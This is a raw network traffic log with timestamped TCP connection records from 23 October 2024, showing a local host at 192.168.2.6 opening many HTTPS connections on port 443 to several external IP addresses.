                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229386091 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229410887 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229434013 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229438066 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229449987 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.229491949 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.230525017 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.230612040 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.230668068 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.230685949 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.231244087 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.231324911 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.231420040 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.235482931 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.235496044 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.236248970 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.236282110 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.236783981 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.239530087 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.239739895 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.239801884 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.239809990 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.240117073 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.240174055 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.240180016 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.240261078 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.240502119 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.241666079 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.241857052 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.241914988 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.241923094 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.242059946 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.242250919 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.243074894 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.243092060 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.269372940 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.269388914 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.269968033 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.269999027 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.270190954 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.270999908 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.271018982 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.272509098 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.272526979 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.273050070 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.273093939 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.273199081 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.278095007 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.278126001 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.311167002 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.324829102 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.324846029 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.326965094 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.326996088 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.328702927 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.328782082 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.328963995 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.328999043 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.329081059 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.346426964 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.346443892 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.364789963 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.364949942 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.364957094 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.365170002 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.389517069 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.389538050 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.390549898 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.390615940 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.390691042 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.392919064 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.392940998 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.409821987 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.409841061 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.436311960 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.436413050 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.436484098 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.451390982 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.459834099 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.459906101 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.460334063 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.460391998 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.653882980 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.654063940 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.654164076 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.654969931 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.654985905 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.683725119 CEST49801443192.168.2.6207.148.0.16
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.683829069 CEST44349801207.148.0.16192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.683911085 CEST49801443192.168.2.6207.148.0.16
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.684256077 CEST49801443192.168.2.6207.148.0.16
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.684288025 CEST44349801207.148.0.16192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.706516981 CEST49802443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.706552029 CEST4434980291.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.706657887 CEST49802443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.707344055 CEST49802443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.707360983 CEST4434980291.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.810096979 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.810358047 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.810372114 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.811830997 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.811887980 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.812849045 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.812927008 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.813218117 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.813224077 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.842848063 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.844099998 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.844189882 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.845401049 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.845415115 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.845861912 CEST4434978813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.846470118 CEST49788443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.846482992 CEST4434978813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.848259926 CEST49788443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.848263979 CEST4434978813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.854268074 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.854782104 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.854811907 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.855401039 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.855412006 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.860368013 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.860641956 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.860662937 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.861721039 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.862293959 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.862468958 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.862560987 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.863629103 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.873311996 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.873845100 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.873924017 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.874448061 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.874463081 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.881082058 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.881370068 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.881383896 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.882447958 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.882452011 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.885081053 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.885401964 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.885420084 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.885884047 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.886470079 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.886553049 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.886847019 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.886975050 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.887168884 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.887197971 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.890748978 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.890852928 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.891408920 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.891588926 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.891726017 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.891742945 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.907331944 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.927369118 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.940393925 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.956156015 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.956370115 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.956389904 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.957365036 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.957437992 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.958426952 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.958492994 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.958909035 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.958919048 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979144096 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979237080 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979525089 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979671001 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979671955 CEST49791443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979722977 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.979753971 CEST4434979113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.983434916 CEST49803443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.983473063 CEST4434980313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.983633041 CEST49803443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.983851910 CEST49803443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.983865976 CEST4434980313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991281033 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991466999 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991530895 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991677046 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991695881 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991720915 CEST49789443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.991735935 CEST4434978913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.995577097 CEST49804443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.995614052 CEST4434980413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.995764971 CEST49804443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.995899916 CEST49804443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:06.995929956 CEST4434980413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.002787113 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.011568069 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.011802912 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.011912107 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012046099 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012142897 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012213945 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012233973 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012362957 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012388945 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012404919 CEST49792443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012413025 CEST4434979213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012433052 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.012620926 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.015453100 CEST49795443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.015470028 CEST44349795141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.015877008 CEST49805443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.015902996 CEST44349805141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.016112089 CEST49805443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.020139933 CEST49805443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.020159006 CEST44349805141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.020766020 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.021029949 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.021111965 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.028574944 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.028582096 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.028592110 CEST49790443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.028595924 CEST4434979013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029211998 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029333115 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029390097 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029408932 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029504061 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029561996 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029576063 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029669046 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029721975 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.029735088 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.034313917 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.034378052 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.034393072 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.037748098 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.037872076 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.037924051 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.039197922 CEST49796443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.039207935 CEST44349796141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.059048891 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.067111969 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.067167044 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.067219019 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.067238092 CEST44349787169.150.247.38192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.067280054 CEST49787443192.168.2.6169.150.247.38
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.074923038 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.078062057 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.078099966 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.079166889 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.079183102 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.080064058 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.080101013 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.080260992 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.080828905 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.080847025 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.081639051 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.081713915 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.082379103 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.082559109 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.082715034 CEST49800443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.082734108 CEST44349800141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.095885038 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.100166082 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.100248098 CEST44349798141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.100322008 CEST49798443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.118355036 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.118383884 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.119494915 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.119601965 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.120172977 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.120248079 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.120842934 CEST49799443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.120855093 CEST44349799141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.122708082 CEST49807443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:07.122740030 CEST4434980713.107.253.72192.168.2.6
